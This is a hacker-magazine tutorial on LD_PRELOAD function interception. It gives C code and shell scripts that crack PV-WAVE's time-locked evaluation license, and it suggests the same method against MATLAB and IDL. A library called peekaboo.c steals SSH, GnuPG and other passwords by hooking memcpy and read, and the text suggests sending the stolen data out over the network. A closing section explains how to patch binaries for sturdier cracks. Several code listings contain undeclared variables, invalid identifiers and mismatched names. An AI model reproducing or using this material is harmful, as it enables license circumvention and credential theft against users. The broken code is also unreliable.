Nigrum Libro Interceptis

by the xorcist

LD_PRELOAD is the name of an environment variable on GNU/Linux and Solaris systems which instructs the dynamic linker to preload and bind a user-specified library prior to binding symbols from the system libraries.

This allows the user to completely intercept many function calls made by a program.

The mechanism is very simple to use and it is hoped that novice C programmers will be able to use this tutorial and its sample code to create libraries of their own.

Below, the reader is shown the basic effect of function overloading and is shown a simple way to call the original function.  From there, we use the techniques to crack the time-lock of the PV-WAVE software (www.roguewave.com), and steal passphrases from SSH.

We close with a brief discussion of other possible uses of LD_PRELOAD.

The Basics of Writing Overloadable Libraries

First, a C file is created which defines the functions that one wishes to intercept, optionally calling the original function by means of libdl.

It is compiled to .o, and linked to .so, and can then be used with LD_PRELOAD.

Let me contrive a simple example for you, and we'll walk through two different layers of intercepting and manipulating program flow through LD_PRELOAD.

main.c

#include <stdio.h>
#include <string.h>
int main()
{
  if (!strcmp("red", "black"))
    printf("true\n");
  else
    printf("false\n");
  return 0;
}

hack.c

int strcmp(char **a, char **b)
{
  return 0;
}

Now, we compile our code:

$ gcc -o foo main.c
$ ./foo
false
$ gcc -fPIC -c hack.c ; ld -shared -Bsymbolic -o hack.so hack.o
$ export LD_PRELOAD=./hack.so
$ ./foo
true

Obviously, our dummy strcmp() worked like a charm, but it will always return 0.

This is fine for this example, but in a real program, we'll need to be able to call the real strcmp()!  To do this, we maintain a function pointer to the real strcmp(), as so:

hack2.c

/* Utility function to return the pointer to a function named by a string */
static void *getfunc(const char *funcName)
{
  void *tmp;

  if ((res = dlsym(RTLD_NEXT, funcName)) == NULL) {
    fprintf(stderr, "error with %s: %s\n", funcName, dlerror());
    _exit(1);
  }
  return tmp;
}

/* Typedef ourselves a function pointer compatible with strcmp() */
typedef char *(*strcmp_t)(char *a, const char *b);

/* A new strcmp() which only returns 0 if its arguments are "red" and "black" 
 * otherwise it returns the true string comparison */
int strcmp(char **a, char **b)
{
  static strcmp_t old_strcmp = NULL;

  /* Set up old_strcmp as a name for the real strcmp() function */
  old_strcmp = getfunc("strcmp");

  if ((!old_strcmp("red", a)) && (!old_strcmp("black", b)))
    return 0;

  return old_strcmp(a, b);
}

Using these basic techniques, and some creativity in the choice of which functions to overload, all sorts of useful things can be done.

Now that we've seen the basic mechanisms of using LD_PRELOAD, we'll start looking at practical uses.

Subverting Time-locked Demonstration Programs

The first application that we'll put together is a generic library for cracking time-locked demo programs.

The strategy that we will use is to create a shared library which constrains the time returned by gettimeofday() to a configurable interval (specified by environment variables).

This way, one instance of the library can be used to fool multiple time-locked demos using different valid date ranges.

As a field test, we'll apply our library against a working time-locked demo of PV-WAVE.

Just like many other commercial Linux/UNIX programs, this program uses FlexLM as its license manager.  Success against PV-WAVE implies applicability against most other commercial demos as well.

We'll call our library fakedate.so and we define the following environment variables:

Overloaded functions: gettimeofday() and time().

fakedata.c

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/* Declare global state that our hijacked functions use */

int HAVE_OPTS = NULL;           /* have we already checked the environment? */
int RUN = 0;                    /* How many times has gettimeofday() run */
int NUMCALLS = 0;               /* How many times to return a bogus time, 0 = always */
int DEBUG = NULL;               /* Do we print debugging info? */
int START_TIME;                 /* Remember the time we started */
time_t MIN = 0;                 /* Minimum time value to return */
time_t MAX = 0;                 /* Maximum time value to return */

/* Inspect the environment and set up the global state */
void loadopts()
{
  if (getenv("FAKEDATE_DEBUG"))
    DEBUG = 1;

  if (getenv("FAKEDATE_MAX"))
    MAX = atol(getenv("FAKEDATE_MAX"));
  else
    MAX = 1;

  if (getenv("FAKEDATE_CALLS"))
    NUMCALLS = atol(getenv("FAKEDATE_CALLS"));
  else
    NUMCALLS = 0;

  if (getenv("FAKEDATE_MIN"))
    FAKEDATE_MIN = atol(getenv("FAKEDATE_MIN"));
  else
    FAKEDATE_MIN = 0;

  __gettimeofday(tv, tz);
  START_TIME = tv->tv_sec;
  HAVE_OPTS = 1;
}

int gettimeofday(struct timeval *tv, struct timezone *tz)
{
  int ret;

  if (!HAVE_OPTS)
    loadopts();

  /* Get the genuine current time */
  ret = __gettimeofday(tv, tz);

  /* If we're munging the date, we map the time into our interval */
  if ((NUMCALLS == 0) || (RUN++ < NUMCALLS))
    tv->tv_sec = MIN + (tv->tv_sec - MIN) % (MAX - MIN);

  if (DEBUG) {
    fprintf(stderr, "FakeDate: GetTimeOfDay [%d , %d] ", MIN, MAX);
    fprintf(stderr, "(tv->tv_sec = %d) ", tv->tv_sec);
    fprintf(stderr, "(%d total calls)\n", NUMCALLS);
  }
  return ret;
}

time_t time(time_t * t)
{
  time_t h;

  struct timeval {
    long tv_sec;
    long tv_usec;
  } tv;

  struct timezone {
    int tz_minuteswest;
    int tz_dsttime;
  } tz;

  gettimeofday(&tv, &tz);

  h = tv.tv_sec;

  if (DEBUG)
    fprintf(stderr, "FakeDate: Time() [%d, %d] (Returned %d)\n", MIN, MAX, h);

  if (t)
    (*t) = h;

  return h;
}

Now, to direct this library against the PV-WAVE time-lock.

If we just finished installing PV-WAVE, we have 12 days to evaluate it before it shuts off (we'll use 11 days to be safe).

So we proceed by getting the time interval we are interested in as seconds from the epoch:

$ d=`date +'%s'` ; echo -e "\nMin: $d\nMax: $[$d+24*60*60*11]"

Min: 1192702886
Max: 1193655286

If PV-WAVE was installed to /usr/local/vni and the fakedate.so library is also placed there, we can now put a wave.sh front-end script in /usr/local/bin such as:

wave.sh

#!/bin/bash
. /usr/local/vni/wave/bin/wvsetup.sh
export LD_PRELOAD=/usr/local/vni/fakedate.so
export FAKEDATE_MIN=1192702886
export FAKEDATE_MAX=1193653286
export FAKEDATE_NUMCALLS=1
/usr/local/vni/wave/bin/wave $*

And that's it.

However, I'll give you a hint here.  You don't need to specify the epoch range as the 11 day period.

In fact, it is somewhat better to actually constrain the interval to a few seconds.  This is because when the program does its expiry check, if the apparent time is very early in the evaluation period, no warnings or messages about time-outs or registration are given.

As the time counts down, PV-WAVE starts reminding you that it will expire.  By constraining the interval to just a few seconds, we insure that PV-WAVE will never nag us.

We can now verify proper functionality.

First, you can break it by moving the epoch range in /usr/local/bin/wave ahead to force the program to time out:

$ cat broken
#!/bin/bash
. /usr/local/vni/wave/bin/wvsetup.sh
export LD_PRELOAD=/usr/local/lib/fakedate.so
export FAKEDATE_MIN=2192702886
export FAKEDATE_MAX=2193653286
export FAKEDATE_NUMCALLS=1
/usr/local/vni/wave/bin/wave $*

$ ./broken -64
The evaluation period for CL has expired.
Contact your system administrator

Now, you can move it back and voilà, it works again:

$ cat working
#!/bin/bash
. /usr/local/vni/wave/bin/wvsetup.sh
export LD_PRELOAD=/usr/local/lib/fakedate.so
export FAKEDATE_MIN=1192702886
export FAKEDATE_MAX=1193653286
export FAKEDATE_NUMCALLS=1
/usr/local/vni/wave/bin/wave $*

$ ./working -64
PV-WAVE Version 9.00 (linux linux64 x86_64).
Copyright (C) 2007, Visual Numerics, Inc.
All rights reserved. Unauthorized reproduction prohibited.

PV-WAVE v9.00 UNIX/WINDOWS
...

Next, let's actually set the system time ahead, say, one year and try the working script.

When we get our WAVE> prompt, we enter the command: PRINT, TODAY()

And we'll see a coded date structure equal to the system time and outside the licensed epoch range.

The first call to gettimeofday() fooled the expiry check and now we're returning the real value because FAKEDATE_NUMCALLS is equal to 1.

$ date; ./working -64
Wed Oct 22 18:15:22 EDT 2008

PV-WAVE Version 9.00 (linux linux64 x86_64).
Copyright (C) 2007, Visual Numerics, Inc.
All rights reserved. Unauthorized reproduction prohibited.
PV-WAVE v9.00 UNIX/WINDOWS

Your current interactive graphics device is: X
If you are not running on a linux integrated display use the SET_PLOT command to set the appropriate
graphics device (if you have not already done so).

The following function keys are defined with PV-WAVE commands:
F1 - Start the PV-WAVE Demonstration/Tutorial System
F2 - Invoke the PV-WAVE Online Help Facility
F3 - Output the PV-WAVE Session Status

PV-WAVE Visual Exploration technology available.
PV-WAVE IMSL Mathematics technology available.
PV-WAVE IMSL Statistics technology available.

Enter "NAVIGATOR" at the WAVE> prompt to start the PV-WAVE Navigator.

WAVE> PRINT, TODAY()
{ 2008  10  22  18  16      2.00000      93541.761      0 }
WAVE>

We now have a fully functional copy of PV-WAVE, and if we use the few-second trick, we don't even get the nagging registration reminders.

This library can also be leveraged against other commercial Linux applications, including pricey high-profile software like MATLAB, Research Systems Inc.'s IDL, and others.  (And don't forget to set your system time back to the current date!)

Function Tracing to Steal Passwords

While the operating system won't allow Set User ID (SUID) programs to honor LD_PRELOAD (so no intercepting passwd or su), there are other important programs, like GnuPG, SSH, Telnet, or KWalletManager which we can subvert in order to steal passphrases, plaintext, and other secret bits.

Which functions would be most useful to us?

We certainly can expect to get a peek up someone's skirt by overloading memcpy().

Likewise, strcpy() and strncpy() are good choices as well, and for the same reasons.

On the I/O side, we'll overload read().

We could easily think of many more functions to add here.

getpass() is conspicuously absent from our list only because it is deprecated.  If you're targeting a legacy application, though, it is easy enough to add.

Our method will be simple passive eavesdropping on the four above-named functions.

We'll export the data that we intercept by appending it to a file in /tmp.

If actually deployed, we'd want to take some precautions here.  Perhaps we might like to encrypt this file by burying a public-key into our lib and randomly generating a symmetric key.  Or, we could transmit the contents out over the network in real-time.  But for this example, I'll just leave it sitting in a file out in /tmp.

peekaboo.c

#include <stdio.h>
#define __USE_GNU 1
#include <unistd.h>
#include <dlfcn.h>

#define FILENAME "/tmp/icu.txt"

/* Typedef our function pointers */
typedef void *(*memcpy_t)(void *dest, const void *src, size_t n);
typedef ssize_t(*read_t) (int FD, void *buf, size_t n);
typedef char *(*strcpy_t)(char *dest, const char *src);
typedef char *(*strncpy_t)(char *dest, const char *src, size_t n);

/* Our global file pointer */
FILE *peekaboofile = NULL;

static void *getfunc(const char *funcName)
{
  void *tmp;

  if ((res = dlsym(RTLD_NEXT, funcName)) == NULL) {
    fprintf(stderr, "error with %s: %s\n", funcName, dlerror());
    _exit(1);
  }
  return tmp;
}

void ensure - file()
{
  if (!peekaboofile)
    peekaboofile = fopen(FILENAME, "a");
}

char *strncpy(char *dest, char *src, size_t n)
{
  static strncpy_t real_strncpy = NULL;

  ensure - file();
  fprintf(peekaboofile,
          "STRNCPY: \nSRC: %s\nDST: %s\nSIZE: %d\n------------------------\n",
          src, dest, n);
  real_strncpy = getfunc("strncpy");
  return real_strncpy(dest, src, n);
}

char *strcpy(char *dest, char *src)
{
  static strcpy_t real_strcpy = NULL;

  ensure - file();
  fprintf(peekaboofile,
          "STRCPY: \nSRC: %s\nDST: %s\n------------------------\n", src, dest);
  real_strcpy = getfunc("strcpy");
  return real_strcpy(dest, src);
}

void *memcpy(void *dest, const void *src, size_t n)
{
  static memcpy_t real_memcpy = NULL;

  ensure - file()
    fprintf(peekaboofile, "MEMCPY: : ");
  fwrite(src, n, 1, stderr);
  fprintf(peekaboofile, "\nDST: ");
  fwrite(dest, n, 1, stderr);
  fprintf(peekaboofile, "\nSIZE: %d\n----------------------\n", n);
  real_memcpy = getfunc("memcpy");
  return real_memcpy(dest, src, n);
}

ssize_t read(int FD, void *buf, size_t n)
{
  static read_t real_read = NULL;
  ssize_t i;

  ensure - file();
  real_read = getfunc("read");
  i = real_read(FD, buf, n);

  fprintf(peekaboofile,
          "READ:\nFD: %d\nBUF: %s\nSIZE: %d\n-------------------\n",
          FD, buf, n);
  return i;
}

For our field test with this library, we'll examine SSH.

Let's get right to it and test this out.

Set up LD_PRELOAD, and SSH to a host of your choice, and log in.

Now, let's take a look at /tmp/icu.txt with something like less.

SSH starts off making a bunch of strncpy() such as:

$ less /tmp/icu.txt
...

STRNCPY:
SRC: Argument list too long
DST:
SIZE: 32
-------------------
STRNCPY:
SRC: Exec format error
DST:
SIZE: 32
-------------------

...

where it is apparently setting up an internal array of messages.  Then we hit a block of several read() and memcpy() where the connection is established and options negotiated.

First, let's find out what the remote host and username are...

Search the file for the string SRC: ssh-connection and you'll find a few memcpy() up is the username on the remote host.

Search for the string SRC: host@ and you'll find the remote hostname.

That was easy.

Now to find the password: Just search the file for the string password and you'll notice that near one of them (the third, in my capture) is the cleartext password intercepted by memcpy().

MEMCPY:
SRC: password
DST: none<F1><FE>rw
SIZE: 8
-------------------
MEMCPY:
SRC: ^Q
DST: <C2>
SIZE: 1
-------------------
MEMCPY:
SRC: ^@^@^@^H
DST: <BE> ^K<E0>
SIZE: 4
-------------------
MEMCPY:
SRC: this-is-my-secret-password
DST: <87>G<E2>^D@<E8>
SIZE: 8
-------------------

In experiments with this and other similar code, every user-land program that handles passwords was vulnerable to this sort of eavesdropping - including GnuPG, Telnet, rdesktop, etc.

This is abysmal, given how easy it is to frustrate this method.  Simple statically-linked clones of getenv() and strcmp() are all that are needed to inspect the environment at startup to insure privacy.

Import Table Patching

Since every piece of software is different, as you might expect, the results of using LD_PRELOAD to overload, say, gettimeofday() will differ.

Suppose, for example, you have a software package where only one binary includes time-lock licensing checks and other binaries use gettimeofday() for other uses.

You might like the other binaries to use the proper gettimeofday(), and only have the time-locked binary get tricked.

One way to do this is by patching the function import table.

Simply open your binary in a hex editor and search for gettimeofday.  You'll find that string in an area with other function names nearby.  Now, you can patch that string and rename it to getximeofday.

Now change your LD_PRELOAD library to provide a getximeofday() function.

The time-locked binary will be fooled, and other binaries will run the proper function and get the correct time.

Using such methods, it is easy to get a very robust crack for many types of evaluation licensed software with minimal effort.

After the library is built, most software examples of that sort can be defeated in 20 to 30 seconds, or less.

Closing Comments

There are many other uses for LD_PRELOAD, naturally.

You might intercept writes to the sound card and dump PCM data to rip audio from software which otherwise does not support the ability to save (Adobe Flash, for instance).

Another important use is for function profiling and reverse engineering.

By overloading selected functions, you can obtain traces of function execution, or counts of the number of times a function was called, etc.

This can be very useful for general debugging purposes.

Code: main.c

Code: hack.c

Code: hack2.c

Code: fakedate.c

Code: wave.sh

Code: peekaboo.c

Return to $2600 Index